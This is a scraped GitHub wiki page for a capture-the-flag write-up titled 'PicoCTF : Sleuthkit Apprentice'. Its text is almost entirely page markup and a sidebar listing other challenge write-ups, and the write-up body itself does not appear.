viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> not1cyyy </span> <span>/</span> CTF-Writeups <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>7</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/not1cyyy/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4 page" id="wiki-wrapper"> <div class="d-flex flex-column flex-md-row gh-header"> <h1 class="flex-auto min-width-0 mb-2 mb-md-0 mr-0 mr-md-2 gh-header-title">PicoCTF : Sleuthkit Apprentice</h1> <div class="mt-0 mt-lg-1 flex-shrink-0 gh-header-actions"> Jump to bottom </div> </div> <div class="mt-2 mt-md-1 pb-3 gh-header-meta"> Firas Chaib edited this page <relative-time datetime="2022-04-18T00:40:53Z" class="no-wrap">Apr 18, 2022</relative-time> · 1 revision </div> <div id="wiki-content" class="mt-4"> <div data-view-component="true" class="Layout Layout--flowRow-until-md Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-sidebar"> <div class="wiki-rightbar"> <div id="wiki-pages-box" class="mb-4 wiki-pages-box js-wiki-pages-box" role="navigation"> <div class="Box Box--condensed color-shadow-small"> <div class="Box-header js-wiki-toggle-collapse" style="cursor: pointer"> <h3 class="Box-title"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toggle-display"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-right js-wiki-sidebar-toggle-display d-none"> <path d="m6.427 4.427 3.396 3.396a.25.25 0 0 1 0 .354l-3.396 3.396A.25.25 0 0 1 6 11.396V4.604a.25.25 0 0 1 .427-.177Z"></path></svg> Pages <span>14</span> </h3> </div> <div class=" js-wiki-sidebar-toggle-display"> <div class="filter-bar"> <input type="text" id="wiki-pages-filter" class="form-control input-sm input-block js-filterable-field" placeholder="Find a page…" aria-label="Find a page…"> </div> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Home</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Home/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> GDG Algiers CTF : franklin last words</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/GDG-Algiers-CTF-:-franklin-last-words/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : Banner</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-Banner/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : CoruptAAAAd</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-CoruptAAAAd/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Eavesdrop</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Eavesdrop/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Operation Oni</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Operation-Oni/_toc"> </include-fragment></details> <details class="details-reset" open> <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron js-wiki-sidebar-toc-toggle-chevron-open mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Sleuthkit Apprentice</span> </div> </summary> Description Files Solution Recon Execution Flag </details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : st3g0</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-st3g0/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Transposition Trial</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Transposition-Trial/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Easy Crypto Challenge</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Easy-Crypto-Challenge/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" 